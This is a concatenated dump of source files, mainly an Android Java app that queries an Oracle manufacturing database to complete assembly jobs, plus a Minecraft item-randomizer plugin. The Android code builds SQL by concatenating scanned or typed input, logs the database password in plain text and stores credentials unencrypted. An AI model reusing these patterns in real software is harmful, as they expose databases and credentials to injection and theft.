port ENV.fetch("PORT") { 3000 }
environment ENV.fetch("RACK_ENV") { "development" }
| 82f38c76e55cd544125ef180611f4aae60be06ef | [
"Ruby",
"Shell"
] | 8 | Ruby | y-yagi/app-server-arena | f0783b7f65c9192c6f0b2e34f90612ec8ce17b1f | f43124c7aebb33e0b49480fe182b85add9634fd1 |
refs/heads/master | <file_sep>include ':app', ':ojdbc14', ':zxing'
<file_sep>package com.quick.completionassygt;
import android.util.Log;
import java.sql.DriverManager;
import java.sql.SQLException;
/**
* Created by Admin on 8/21/2017.
*/
public class Koneksi {
public java.sql.Connection getConnection(String serverName, String port, String sid, String username, String password){
try{
Class.forName("oracle.jdbc.driver.OracleDriver");
String url = "jdbc:oracle:thin:@"+serverName+":"+port+":"+sid;
Log.d("Koneksi", "Connected to database->"+url+username+password);
return DriverManager.getConnection(url,username,password);
}catch (ClassNotFoundException | SQLException e){
e.printStackTrace();
}
return null;
}
}
<file_sep>package com.quick.completionassygt;
import android.content.Context;
import android.os.Handler;
import android.util.Log;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.view.animation.Animation;
import android.view.animation.AnimationUtils;
import android.widget.AdapterView;
import android.widget.TextView;
import androidx.cardview.widget.CardView;
import androidx.recyclerview.widget.RecyclerView;
import java.io.InputStream;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.Scanner;
/**
* Created by Admin on 9/2/2017.
*/
public class RecyclerCompletion extends RecyclerView.Adapter<RecyclerCompletion.ViewHolder> {
private Context mContext;
private ResultSet mResult;
final private ItemClickListener mItemClickListener;
private Boolean mState;
Runnable runnable;
int delayAnimate = 300;
int itemCount;
Handler controlDelay = new Handler();
int bindPos, lastBindPos, lastGetDelay;
public RecyclerCompletion(Context context, ResultSet result, ItemClickListener listener, Boolean state) {
mContext = context;
mResult = result;
mItemClickListener = listener;
mState = false;
mState = state;
}
public interface ItemClickListener {
void OnItemClick(String jobName, String jobId, String item, String qtyAvail, String qtyComplete);
}
@Override
public int getItemCount() {
try {
mResult.last();
itemCount = mResult.getRow();
return itemCount;
} catch (SQLException e) {
e.printStackTrace();
}
return 0;
}
@Override
public ViewHolder onCreateViewHolder(ViewGroup parent, int viewType) {
LayoutInflater inflater = LayoutInflater.from(parent.getContext());
View view = inflater.inflate(R.layout.row_list_job, parent, false);
return new ViewHolder(view);
}
@Override
public void onBindViewHolder(ViewHolder holder, int position) {
//bindPos selalu berganti tiap bind
bindPos = position;
//lastBindPos untuk mengetahui berapa item yang sudah di scroll down
if (position > lastBindPos) {
lastBindPos = bindPos;
}
try {
mResult.absolute(position + 1);
String job = readStream(mResult.getAsciiStream(1));
String tgl = readStream(mResult.getAsciiStream(2));
String qtyStart = mResult.getString(3);
String qtyComplete = mResult.getString(4);
String status = mResult.getString(6);
String item = readStream(mResult.getAsciiStream(8));
String desc =readStream(mResult.getAsciiStream(9));
holder.tv_job.setText(job);
holder.tv_tgl.setText(tgl);
holder.tv_qtyStart.setText(qtyStart);
holder.tv_qtyComplete.setText(qtyComplete);
holder.tv_item.setText(item);
holder.tv_desc.setText(desc);
if(status.equals("0")){
holder.tv_tgl.setTextColor(mContext.getResources().getColor(R.color.red));
}else {
holder.tv_tgl.setTextColor(mContext.getResources().getColor(R.color.font));
}
//animasi hanya tampil saat bind awal
Log.d("Cursor Posisi", "" + bindPos);
Log.d("Bind Posisi", "" + lastBindPos);
} catch (SQLException e) {
e.printStackTrace();
}
holder.cv_parent.setCardBackgroundColor(mContext.getResources().getColor(R.color.white));
if (mState){
holder.cv_parent.setCardBackgroundColor(mContext.getResources().getColor(R.color.yellow));
holder.cv_parent.setEnabled(false);
}else {
holder.cv_parent.setCardBackgroundColor(mContext.getResources().getColor(R.color.white));
if (bindPos == lastBindPos && lastBindPos < itemCount) {
holder.cv_parent.setVisibility(View.INVISIBLE);
setAnimation(holder.cv_parent);
controlDelay();
if (lastBindPos + 1 == itemCount) {
lastBindPos += 1;
}
}
}
}
private void setAnimation(final View view) {
Handler handler = new Handler();
handler.postDelayed(new Runnable() {
public void run() {
Animation animation = AnimationUtils.loadAnimation(mContext, android.R.anim.slide_in_left);
if (view != null) {
view.startAnimation(animation);
view.setVisibility(View.VISIBLE);
runnable = this;
Log.d("Animate", "running");
}
}
}, delayAnimate);
delayAnimate += 300;
}
//Mengembalikan delay ke 0 jika animasi tidak berjalan
void controlDelay() {
controlDelay.postDelayed(new Runnable() {
@Override
public void run() {
runnable = this;
if (lastGetDelay == delayAnimate) {
delayAnimate = 0;
controlDelay.removeCallbacks(runnable);
Log.d("ControlDelay", "OFF");
} else {
controlDelay.postDelayed(runnable, 600);
Log.d("ControlDelay", "ON");
lastGetDelay = delayAnimate;
}
}
}, 600);
}
private String readStream(InputStream data) {
Scanner s = new Scanner(data).useDelimiter("\\A");
return s.hasNext() ? s.next() : "";
}
class ViewHolder extends RecyclerView.ViewHolder implements AdapterView.OnClickListener {
CardView cv_parent;
TextView tv_job, tv_tgl, tv_qtyStart, tv_qtyComplete, tv_item, tv_desc;
public ViewHolder(View itemView) {
super(itemView);
cv_parent = (CardView) itemView.findViewById(R.id.cv_parent);
tv_job = (TextView) itemView.findViewById(R.id.tv_job);
tv_tgl = (TextView) itemView.findViewById(R.id.tv_tgl);
tv_qtyStart = (TextView) itemView.findViewById(R.id.tv_qtyStart);
tv_qtyComplete = (TextView) itemView.findViewById(R.id.tv_qtyComplete);
tv_item = (TextView) itemView.findViewById(R.id.tv_item);
tv_desc = (TextView) itemView.findViewById(R.id.tv_desc);
cv_parent.setOnClickListener(this);
}
@Override
public void onClick(View v) {
try {
mResult.absolute(getAdapterPosition() + 1);
String jobName = readStream(mResult.getAsciiStream(1));
String jobId = mResult.getString(7);
String qtyAvail = mResult.getString(5);
String qtyComplete = mResult.getString(4);
String item = readStream(mResult.getAsciiStream(8));
mItemClickListener.OnItemClick(jobName, jobId, item, qtyAvail, qtyComplete);
} catch (SQLException e) {
e.printStackTrace();
}
}
private String readStream(InputStream data) {
Scanner s = new Scanner(data).useDelimiter("\\A");
return s.hasNext() ? s.next() : "";
}
}
}
<file_sep>package com.quick.completionassygt;
import android.content.Context;
import android.content.Intent;
import android.content.SharedPreferences;
import java.sql.Connection;
import java.util.HashMap;
class ManagerSessionUserOracle {
private SharedPreferences pref;
private static final String PREF_NAME = "session";
private final String KEY_IS_LOGIN = "isLogin";
static final String KEY_USERNAME = "username";
static final String KEY_PASSWORD = "<PASSWORD>";
static final String KEY_USEID = "user_id";
static final String KEY_cName = "cName";
static final String KEY_cPort = "cPort";
static final String KEY_cSid = "cSid";
static final String KEY_cUsername = "cUsername";
static final String KEY_cPassword = "<PASSWORD>";
static final String KEY_PERSON = "person";
Context mContext;
ManagerSessionUserOracle(Context context) {
mContext = context;
pref = mContext.getSharedPreferences(PREF_NAME, 0);//PrivateMode
}
void createUserSession(String username, String password, String userid,
String cName, String cPort, String cSid, String cUsername, String cPassword, String person) {
SharedPreferences.Editor edit;
edit = pref.edit();
edit.putBoolean(KEY_IS_LOGIN, true);
edit.putString(KEY_USERNAME, username);
edit.putString(KEY_PASSWORD, <PASSWORD>);
edit.putString(KEY_USEID, userid);
edit.putString(KEY_cName, cName);
edit.putString(KEY_cPort, cPort);
edit.putString(KEY_cSid, cSid);
edit.putString(KEY_cUsername, cUsername);
edit.putString(KEY_cPassword, cPassword);
edit.putString(KEY_PERSON, person);
edit.apply();
}
HashMap<String, String> getUserData() {
HashMap<String, String> userData = new HashMap<>();
userData.put(KEY_USERNAME, pref.getString(KEY_USERNAME, null));
userData.put(KEY_PASSWORD, pref.getString(KEY_PASSWORD, null));
userData.put(KEY_USEID, pref.getString(KEY_USEID, null));
userData.put(KEY_cName, pref.getString(KEY_cName, null));
userData.put(KEY_cPort, pref.getString(KEY_cPort, null));
userData.put(KEY_cSid, pref.getString(KEY_cSid, null));
userData.put(KEY_cUsername, pref.getString(KEY_cUsername, null));
userData.put(KEY_cPassword, pref.getString(KEY_cPassword, null));
userData.put(KEY_PERSON, pref.getString(KEY_PERSON, null));
return userData;
}
String getSID() {
return pref.getString(KEY_cSid, "");
}
String getUser() {
return pref.getString(KEY_USERNAME, "");
}
String getUserId() {
return pref.getString(KEY_USEID, null);
}
Boolean isUserLogin() {
return pref.getBoolean(KEY_IS_LOGIN, false);
}
public void logoutUser() {
pref.edit().clear().apply();
// After logout redirect user to Login Activity
Intent i = new Intent(mContext, LoginActivity.class);
// Closing all the Activities
i.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TOP);
// Add new Flag to start new Activity
i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
// Staring Login Activity
mContext.startActivity(i);
}
Connection connectDb() {
HashMap<String, String> userData = getUserData();
String cName = userData.get(KEY_cName);
String cPort = userData.get(KEY_cPort);
String cSid = userData.get(KEY_cSid);
String cUsername = userData.get(KEY_cUsername);
String cPassword = userData.get(KEY_cPassword);
return new Koneksi().getConnection(cName, cPort, cSid, cUsername, cPassword);
}
}
<file_sep>package com.quick.completionassygt.Rest;
import com.quick.completionassygt.Model.Login_Model;
import com.quick.completionassygt.Model.User_Model;
import retrofit2.Call;
import retrofit2.http.Field;
import retrofit2.http.FormUrlEncoded;
import retrofit2.http.POST;
public interface API_Link {
@FormUrlEncoded
@POST("loginAndroid")
Call<Login_Model> login(@Field("username") String user, @Field("password") String password);
@FormUrlEncoded
@POST("logUser")
Call<User_Model> loguser(@Field("username") String user); //api untuk mengecek apakah user terdaftar
}
<file_sep>package com.quick.completionassygt;
import android.content.Context;
import android.content.Intent;
import android.content.SharedPreferences;
import java.util.HashMap;
public class ManageSessionUser {
private SharedPreferences preferences;
private static final String PREF_NAME = "session";
private final String KEY_IS_LOGIN = "isLogin";
static final String KEY_USERNAME = "username";
static final String KEY_PASSWORD = "<PASSWORD>";
Context mContext;
ManageSessionUser(Context context) {
mContext = context;
preferences = mContext.getSharedPreferences(PREF_NAME, 0); //PrivateMode
}
void createUserSession(String username, String password) {
SharedPreferences.Editor edit;
edit = preferences.edit();
edit.putBoolean(KEY_IS_LOGIN, true);
edit.putString(KEY_USERNAME, username);
edit.putString(KEY_PASSWORD, <PASSWORD>);
edit.apply();
}
HashMap<String, String> getUserData() {
HashMap<String, String> userData = new HashMap<>();
userData.put(KEY_USERNAME, preferences.getString(KEY_USERNAME, null));
userData.put(KEY_PASSWORD, preferences.getString(KEY_PASSWORD, null));
return userData;
}
String getUser() {
return preferences.getString(KEY_USERNAME, "");
}
Boolean isUserLogin() {
return preferences.getBoolean(KEY_IS_LOGIN, false);
}
public void logoutUser() {
preferences.edit().clear().apply();
// After logout redirect user to Login Activity
Intent i = new Intent(mContext, LoginActivity.class);
// Closing all the Activities
i.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TOP);
// Add new Flag to start new Activity
i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
// Staring Login Activity
mContext.startActivity(i);
}
}
<file_sep>package com.quick.completionassygt;
import android.Manifest;
import android.content.DialogInterface;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.os.Bundle;
import android.util.Log;
import android.view.KeyEvent;
import android.view.View;
import android.widget.ImageView;
import android.widget.Toast;
import androidx.annotation.NonNull;
import androidx.appcompat.app.AlertDialog;
import androidx.appcompat.app.AppCompatActivity;
import androidx.core.app.ActivityCompat;
import androidx.core.content.ContextCompat;
import androidx.recyclerview.widget.LinearLayoutManager;
import androidx.recyclerview.widget.RecyclerView;
import com.facebook.stetho.Stetho;
import com.google.android.material.dialog.MaterialAlertDialogBuilder;
import com.google.android.material.snackbar.Snackbar;
import com.google.android.material.textfield.TextInputEditText;
import com.google.zxing.client.android.CaptureActivity;
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import cn.pedant.SweetAlert.SweetAlertDialog;
public class CompletionActivity extends AppCompatActivity implements RecyclerCompletion.ItemClickListener{
ImageView iv_scan;
TextInputEditText et_code;
Connection mConn;
ManagerSessionUserOracle session;
SweetAlertDialog sweetAlertDialog;
RecyclerView rv_job;
String mQuery, seqNum = "10";
String jobName, jobId;
LinearLayoutManager layoutManager;
RecyclerCompletion adapter;
Boolean stateRunnable=false;
String serial = "";
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_completion);
new ModuleTool().allowNetworkOnMainThread();
Stetho.initializeWithDefaults(this);
session = new ManagerSessionUserOracle(this);
mConn = session.connectDb();
if (session.getSID().equals("DEV")) {
setTitle("Completion [ DEV ]");
} else {
setTitle("Completion [ PROD ]");
}
iv_scan = findViewById(R.id.iv_scan);
et_code = findViewById(R.id.et_code);
rv_job = findViewById(R.id.rv_job);
et_code.setOnKeyListener(new View.OnKeyListener() {
@Override
public boolean onKey(View view, int i, KeyEvent keyEvent) {
if (keyEvent.getAction() == KeyEvent.ACTION_DOWN) {
switch (i) {
case KeyEvent.KEYCODE_DPAD_CENTER:
case KeyEvent.KEYCODE_ENTER:
//if else isAny
if (et_code.getText().toString().contains(",")) {
String[] code = et_code.getText().toString().split(",");
String item_id = code[0];
serial = code[1];
jobName = getJobByItemId(item_id);
} else if (isAnyMsib(et_code.getText().toString())) {
String item_id = getInvItemId(et_code.getText().toString());
jobName = getJobByItemId(item_id);
} else {
jobName = cekJob(et_code.getText().toString());
}
if (jobName.equals("0")) {
if (jobType(jobName)) {
Snackbar.make(getWindow().getDecorView().getRootView(), "Job Non-Standard", Snackbar.LENGTH_LONG)
.show();
} else {
Log.e("cek job", "data null");
Snackbar.make(getWindow().getDecorView().getRootView(), "Data tidak tersedia", Snackbar.LENGTH_LONG)
.show();
}
} else {
et_code.setText(jobName);
jobId = getJobId(jobName);
stateRunnable = isProcessed(jobId);
if(stateRunnable){
createRecyclerView(jobName, true);
} else {
createRecyclerView(jobName, false);
}
Log.e("cek job", "ada data");
}
return true;
default:
break;
}
}
return false;
}
});
}
public void scan(View view) {
runtimePermission();
}
void runtimePermission() {
int permissionCheck = ContextCompat.checkSelfPermission(this, Manifest.permission.CAMERA);
if (permissionCheck == PackageManager.PERMISSION_DENIED) {
ActivityCompat.requestPermissions(this, new String[]{Manifest.permission.CAMERA}, 26);
} else {
//normal
Intent i = new Intent(this, CaptureActivity.class);
i.putExtra("TITLE_SCAN", "Scan");
i.putExtra("SAVE_HISTORY", false);
i.setAction("com.google.zxing.client.android.SCAN");
startActivityForResult(i, 0);
}
}
@Override
public void onRequestPermissionsResult(int requestCode, @NonNull String[] permissions, @NonNull int[] grantResults) {
super.onRequestPermissionsResult(requestCode, permissions, grantResults);
if (requestCode == 26 && grantResults[0] == PackageManager.PERMISSION_DENIED) {
Toast.makeText(this, "Izinkan aplikasi mengakses kamera untuk melakukan SCANN", Toast.LENGTH_SHORT).show();
} else {
runtimePermission();
}
}
@Override
protected void onActivityResult(int requestCode, int resultCode, Intent data) {
super.onActivityResult(requestCode, resultCode, data);
if (requestCode == 0 && resultCode == RESULT_OK) {
final String scanContent = data.getStringExtra("SCAN_RESULT");
Log.d("Scan", scanContent);
if (scanContent != null) {
if (scanContent.contains(",")) { //scan kartu body
String[] code = scanContent.split(",");
String item_id = code[0];
serial = code[1];
jobName = getJobByItemId(item_id);
} else if (isAnyMsib(scanContent)) { //scan item
String item_id = getInvItemId(scanContent);
jobName = getJobByItemId(item_id);
} else { //kemungkinan scan no job langsung
jobName = cekJob(scanContent);
}
if (jobName.equals("0")) {
if (jobType(jobName)) {
Snackbar.make(getWindow().getDecorView().getRootView(), "Job Non-Standard", Snackbar.LENGTH_LONG)
.show();
} else {
Log.e("cek job", "data null");
Snackbar.make(getWindow().getDecorView().getRootView(), "Data tidak tersedia", Snackbar.LENGTH_LONG)
.show();
}
} else {
et_code.setText(jobName);
jobId = getJobId(jobName);
stateRunnable = isProcessed(jobId);
if(stateRunnable){
createRecyclerView(jobName, true);
} else {
createRecyclerView(jobName, false);
}
Log.e("cek job", "ada data");
}
}
} else if (resultCode == RESULT_CANCELED) {
Toast.makeText(getApplicationContext(), "Canceled", Toast.LENGTH_LONG).show();
}
}
String translateSerial(String itemId, String serial){
try{
Statement statement = mConn.createStatement();
mQuery = "SELECT serial_format \n" +
"FROM khs_serial_code\n" +
"WHERE item_id = "+itemId;
ResultSet result = statement.executeQuery(mQuery);
if (result.next()){
String format = result.getString(1);
return format.replace("-",serial);
}
}catch (SQLException e){
e.printStackTrace();
}
return "";
}
public boolean jobType(String job) {
Boolean ver;
ResultSet theResultSet;
try {
Statement statement = mConn.createStatement();
String mQuery = "select count(*)\n" +
"from wip_operations wo\n" +
" ,wip_entities we\n" +
"where wo.WIP_ENTITY_ID = we.WIP_ENTITY_ID\n" +
" and we.WIP_ENTITY_NAME = '" + job + "'";
theResultSet = statement.executeQuery(mQuery);
Log.e("jobType :", mQuery);
System.out.println(" " + theResultSet + " ");
ver = true;
} catch (SQLException e) {
e.printStackTrace();
ver = false;
}
return ver;
}
public boolean isAnyMsib(String item) {
Integer ver = 0;
ResultSet theResultSet;
try {
Statement statement = mConn.createStatement();
String mQuery = "SELECT count(DISTINCT msib.SEGMENT1)\n" +
"FROM mtl_system_items_b msib\n" +
"WHERE msib.SEGMENT1 = '" + item + "'";
theResultSet = statement.executeQuery(mQuery);
Log.e("isAnyMsib :", mQuery);
System.out.println(" " + theResultSet + " ");
if (theResultSet.next()) {
ver = Integer.parseInt(theResultSet.getString(1));
}
} catch (SQLException e) {
e.printStackTrace();
}
if (ver > 0) {
return true;
} else {
return false;
}
}
public boolean isSerial(String item) {
Integer ver = 0;
ResultSet theResultSet;
try {
Statement statement = mConn.createStatement();
String mQuery = "select count(*)\n" +
"from\n" +
"mtl_system_items_b msib\n" +
",mtl_serial_numbers msn\n" +
"where\n" +
"msib.inventory_item_id = msn.INVENTORY_ITEM_ID\n" +
"and msib.SEGMENT1 = '"+item+"'";
theResultSet = statement.executeQuery(mQuery);
Log.e("isAnySerial :", mQuery);
System.out.println(" " + theResultSet + " ");
if (theResultSet.next()) {
ver = Integer.parseInt(theResultSet.getString(1));
}
} catch (SQLException e) {
e.printStackTrace();
}
if (ver > 0) {
return true;
} else {
return false;
}
}
public String getJobByItemId(String item_id) {
String data = "";
Connection dbConnection = null;
Statement statement = null;
ResultSet theResultSet;
dbConnection = mConn;
try {
statement = dbConnection.createStatement();
mQuery = "SELECT NVL(min(we.wip_entity_name), 0) \n" +
" FROM wip_entities we,\n" +
" wip_discrete_jobs wdj,\n" +
" wip_operations wo,\n" +
" mtl_system_items_b msib\n" +
" WHERE we.primary_item_id = msib.inventory_item_id\n" +
" AND we.wip_entity_id = wdj.wip_entity_id\n" +
" AND wo.wip_entity_id = wdj.wip_entity_id\n" +
" AND msib.organization_id = we.organization_id\n" +
" AND wdj.status_type = 3\n" +
" and msib.INVENTORY_ITEM_ID = '" + item_id + "'\n" +
" ORDER BY wdj.scheduled_start_date";
Log.e("getJob ItemId", mQuery);
ResultSet result = statement.executeQuery(mQuery);
if (result.next()) {
data = result.getString(1);
}
} catch (SQLException e) {
e.printStackTrace();
}
return data;
}
public String cekJob(String code) {
String data = "";
Connection dbConnection = null;
Statement statement = null;
ResultSet theResultSet;
dbConnection = mConn;
try {
statement = dbConnection.createStatement();
mQuery = "SELECT NVL(min(we.wip_entity_name), 0) \n" +
" FROM wip_entities we,\n" +
" wip_discrete_jobs wdj,\n" +
" wip_operations wo,\n" +
" mtl_system_items_b msib\n" +
" WHERE we.primary_item_id = msib.inventory_item_id\n" +
" AND we.wip_entity_id = wdj.wip_entity_id\n" +
" AND wo.wip_entity_id = wdj.wip_entity_id\n" +
" AND msib.organization_id = we.organization_id\n" +
" AND wdj.status_type = 3\n" +
" and we.wip_entity_name = '" + code + "'\n" +
" ORDER BY wdj.scheduled_start_date";
Log.e("getJob ItemId", mQuery);
ResultSet result = statement.executeQuery(mQuery);
if (result.next()) {
data = result.getString(1);
}
} catch (SQLException e) {
e.printStackTrace();
}
return data;
}
public String getInvItemId(String code) {
String data = "";
Connection dbConnection = null;
Statement statement = null;
ResultSet theResultSet;
dbConnection = mConn;
try {
statement = dbConnection.createStatement();
mQuery = "SELECT DISTINCT msib.INVENTORY_ITEM_ID \n" +
"FROM mtl_system_items_b msib\n" +
"WHERE msib.SEGMENT1 = '" + code + "'";
Log.e("get ItemId", mQuery);
ResultSet result = statement.executeQuery(mQuery);
if (result.next()) {
data = result.getString(1);
}
} catch (SQLException e) {
e.printStackTrace();
}
return data;
}
boolean isProcessed(String jobId) {
try {
Statement statement = mConn.createStatement();
mQuery = "SELECT * FROM mtl_transactions_interface \n" +
"WHERE TRANSACTION_SOURCE_ID = " + jobId + " \n" +
"AND PROCESS_FLAG=1";
ResultSet result = statement.executeQuery(mQuery);
Log.d("isProcessed", mQuery);
if (result.next()) {
return true;
} else {
return false;
}
} catch (SQLException e) {
e.printStackTrace();
}
return false;
}
String getJobId(String code){
try{
Statement statement = mConn.createStatement();
mQuery = "SELECT we.wip_entity_name, we.wip_entity_id\n" +
" FROM wip_entities we,\n" +
" wip_discrete_jobs wdj,\n" +
" wip_operations wo,\n" +
" mtl_system_items_b msib\n" +
" WHERE we.primary_item_id = msib.inventory_item_id\n" +
" AND we.wip_entity_id = wdj.wip_entity_id\n" +
" AND wo.wip_entity_id = wdj.wip_entity_id\n" +
" AND msib.organization_id = we.organization_id\n" +
" AND we.WIP_ENTITY_NAME = '"+code+"'\n" +
" AND wo.operation_seq_num = \n" +
" (SELECT max(wo2.OPERATION_SEQ_NUM) FROM WIP_OPERATIONS wo2\n" +
" WHERE wo2.WIP_ENTITY_ID = we.WIP_ENTITY_ID)\n" +
" AND wdj.status_type in (3,4)\n" +
" ORDER BY wdj.scheduled_completion_date";
Log.d("getjobid : ",mQuery);
ResultSet result = statement.executeQuery(mQuery);
if (result.next()){
String jobId = result.getString(2);
return jobId;
}
}catch (SQLException e){
e.printStackTrace();
}
return "";
}
void createRecyclerView(String code, Boolean state) {
Log.d("Conn", "." + mConn);
if (mConn == null) {
Toast.makeText(this, "No Connection", Toast.LENGTH_SHORT).show();
return;
}
try {
Statement statement = mConn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
ResultSet.CONCUR_READ_ONLY);
mQuery = "SELECT we.wip_entity_name, TO_CHAR(wdj.scheduled_completion_date,'dd MON YYYY HH24:mi'), \n" +
"nvl(wo.QUANTITY_WAITING_TO_MOVE,0), wdj.QUANTITY_COMPLETED, wo.QUANTITY_WAITING_TO_MOVE available,\n" +
"CASE WHEN wdj.scheduled_completion_date < SYSDATE THEN 0\n" +
"ELSE 1 END status, we.wip_entity_id, msib.SEGMENT1 , msib.DESCRIPTION \n" +
"FROM wip_entities we,\n" +
"wip_discrete_jobs wdj,\n" +
"wip_operations wo,\n" +
"mtl_system_items_b msib\n" +
"WHERE we.primary_item_id = msib.inventory_item_id\n" +
"AND we.wip_entity_id = wdj.wip_entity_id\n" +
"AND wo.wip_entity_id = wdj.wip_entity_id\n" +
"AND msib.organization_id = we.organization_id\n" +
"AND we.WIP_ENTITY_NAME = '" + code + "'\n" +
"AND wo.operation_seq_num = \n" +
"(SELECT max(wo2.OPERATION_SEQ_NUM) FROM WIP_OPERATIONS wo2\n" +
"WHERE wo2.WIP_ENTITY_ID = we.WIP_ENTITY_ID)\n" +
"AND wdj.status_type in (3,4)\n" +
"ORDER BY wdj.scheduled_completion_date";
Log.d("QUERY", mQuery);
ResultSet result = statement.executeQuery(mQuery);
if (result.next()) {
layoutManager = new LinearLayoutManager(getApplicationContext());
adapter = new RecyclerCompletion(getApplicationContext(), result, this, state);
rv_job.setLayoutManager(layoutManager);
rv_job.hasFixedSize();
rv_job.setAdapter(adapter);
} else {
Snackbar.make(getWindow().getDecorView().getRootView(), "Data tidak tersedia", Snackbar.LENGTH_LONG)
.show();
}
} catch (SQLException e) {
e.printStackTrace();
}
}
@Override
public void OnItemClick(String jobName, String jobId, String item, String qtyAvail, String qtyComplete) {
if(isProcessed(jobId)){
dialogProcces();
}else {
int complete = Integer.parseInt(qtyComplete);
int move = Integer.parseInt(qtyAvail);
if (move==0){
dialogQty();
}else {
if(isSerial(item)){
if(serial.length()==0){
Snackbar.make(getWindow().getDecorView().getRootView(), "Item serial, silahkan ulang scan/input dengan kartu body", Snackbar.LENGTH_LONG)
.show();
} else {
Intent i = new Intent(this, ProcessSerialActivity.class);
i.putExtra("jobName",jobName);
i.putExtra("qtyAvail",qtyAvail);
i.putExtra("serial",translateSerial(getInvItemId(item), serial));
startActivity(i);
}
} else {
Intent i = new Intent(this, ProcessActivity.class);
i.putExtra("jobName",jobName);
i.putExtra("qtyAvail",qtyAvail);
startActivity(i);
}
}
}
}
void dialogProcces(){
new MaterialAlertDialogBuilder(this)
.setTitle("Alert!")
.setMessage("Job ini sedang diproses!")
.setPositiveButton("OK", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
dialog.cancel();
}
}).show();
}
void dialogQty(){
new MaterialAlertDialogBuilder(this)
.setTitle("Alert!")
.setMessage("Tidak ada qty yang bisa dicompletion!")
.setPositiveButton("OK", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
dialog.cancel();
}
}).show();
}
public void backMenu() {
new MaterialAlertDialogBuilder(CompletionActivity.this)
.setIcon(R.drawable.ic_warning)
.setTitle("Perhatian!")
.setMessage("Anda yakin ingin kembali ke menu? ")
.setPositiveButton("Ya", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
Intent intent = new Intent(getApplicationContext(), MenuActivity.class);
intent.setFlags(Intent.FLAG_ACTIVITY_NO_HISTORY);
intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TOP);
intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
startActivity(intent);
finish();
}
})
.setNegativeButton("Tidak", null)
.create().show();
}
@Override
public void onBackPressed() {
backMenu();
}
}
| b164fa7455cab44a3419c7cf018f9e90f867004b | [
"Java",
"Gradle"
] | 7 | Gradle | godelivdiva/Quickdroid-CompletionASSY-GT | 8051d726f56aeb13ad7d732508c41e1cdc782689 | 39b87d8e0a6da3efdcf9bb08748bfb4d02cf7cb7 |
refs/heads/master | <repo_name>Jon-M-G/RandomizerPluginProject<file_sep>/src/pg/Pot4toLord/RandomCrafter.java
package pg.Pot4toLord;
import org.bukkit.Material;
import org.bukkit.block.EnchantingTable;
import org.bukkit.event.inventory.*;
import org.bukkit.inventory.EnchantingInventory;
import org.bukkit.inventory.ItemStack;
import org.bukkit.Bukkit;
import org.bukkit.ChatColor;
import org.bukkit.entity.Player;
import org.bukkit.event.EventHandler;
import org.bukkit.event.Listener;
import org.bukkit.event.entity.EntityDeathEvent;
import org.bukkit.event.player.PlayerJoinEvent;
import org.bukkit.inventory.meta.ItemMeta;
import org.bukkit.plugin.java.JavaPlugin;
import java.util.List;
import java.util.Random;
public class RandomCrafter extends JavaPlugin implements Listener{
@Override
public void onEnable(){
Bukkit.getServer().getConsoleSender().sendMessage(ChatColor.GREEN + "RandomizerCrafter has been successfully loaded.");
//get the config info to chose random items
getConfig().options().copyDefaults(true);
saveConfig();
//register sever events
this.getServer().getPluginManager().registerEvents(this,this);
}
@EventHandler
public void onMobDeath(EntityDeathEvent event){
event.setDroppedExp(30);
event.getEntity().getWorld().dropItemNaturally(event.getEntity().getLocation(), getRandomItem(null));
Bukkit.getServer().getConsoleSender().sendMessage(ChatColor.RED + "Mob has been Slain");
event.getDrops().clear();
}
@EventHandler
public void onJoin(PlayerJoinEvent event){
Player player = event.getPlayer();
player.getInventory().addItem(getRandomItem(null));
}
private int getRandomTier(){
int tier;
double chance = new Random().nextDouble()*100;
if (chance<=1){
if (chance<=.5){
tier = 3;
}
else
tier = 2;
}
else
tier = 1;
return tier;
}
private ItemStack getRandomItem(ItemStack expectedItem){
//grab a random item from the list of items
String TierString = "Tier" + getRandomTier() + "_Items";
String TestList = "Small_List";
List<String> RandomItemList = this.getConfig().getStringList(TierString);
Bukkit.getServer().getConsoleSender().sendMessage(ChatColor.RED + (RandomItemList.size()+"") +'\n');
int index = new Random().nextInt(RandomItemList.size());
String items = RandomItemList.get(index);
Bukkit.getServer().getConsoleSender().sendMessage(ChatColor.RED + (items+"") );
ItemStack newItem = expectedItem; //set this as expected item for if matchMaterial() comes back as null
//try catch to test if the code being tried through matchMaterial is a legacy code or just invalid.
try{
newItem = new ItemStack(Material.matchMaterial(items.toUpperCase()));
} //rename the intended crafted item to the name of the faulty legacy code for easy identifying broken codes
catch(IllegalArgumentException ex){
//rename the item to the name of broken minecraft item codes
ItemMeta meta = newItem.getItemMeta();
Bukkit.getServer().getConsoleSender().sendMessage(ChatColor.RED + expectedItem.getItemMeta().getDisplayName() );
meta.setDisplayName(items);
newItem.setItemMeta(meta);
}
return newItem;
}
@EventHandler
public void onInventoryClick(InventoryClickEvent event){
if(event.getInventory().getType() != InventoryType.ANVIL && event.getInventory().getType() != InventoryType.GRINDSTONE){
Bukkit.getServer().getConsoleSender().sendMessage(ChatColor.YELLOW + "ANVIL" );
if(event.getSlotType() == InventoryType.SlotType.RESULT && event.getCurrentItem()!= null ) {
try {
Bukkit.getServer().getConsoleSender().sendMessage(ChatColor.YELLOW + event.getCurrentItem().getItemMeta().getDisplayName());
ItemStack expectedItem = event.getCurrentItem();
event.setCurrentItem(getRandomItem(expectedItem));
} catch (NullPointerException ex) {
Bukkit.getServer().getConsoleSender().sendMessage(ChatColor.YELLOW + "Empty Crafting Slot Click detected");
}
}
}
}
}
| e15479ab8d588ba0550904b8d6c3b3e51c7fdc1d | [
"Java"
